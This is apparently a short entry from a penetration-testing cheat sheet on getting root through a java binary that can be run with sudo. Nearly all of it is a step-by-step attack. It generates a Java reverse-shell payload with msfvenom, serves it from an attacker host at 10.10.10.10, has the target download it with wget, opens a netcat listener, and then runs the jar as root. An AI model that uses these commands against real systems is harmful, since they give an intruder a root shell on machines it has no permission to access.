/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java

Try with other java versions, multi-step process

a)craft a reverse shell payload with msfvenom

sudo msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=9999 -f jar -o reverse.jat

b) Move into a jar file

sudo mv reverse.jat reverse.jar

c)

sudo mv reverse.jar /var/www/html

d) Start an nginx server for deployment on target

sudo service nginx start

e) From target, wget the payload

wget http://10.10.10.10/reverse.jar

f) From kali start a listener

nc -nvlp 9999

g) Trigger the exploit from target

sudo /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java -jar /tmp/reverse.jar

PreviousjjsNext/usr/bin/vim

Last updated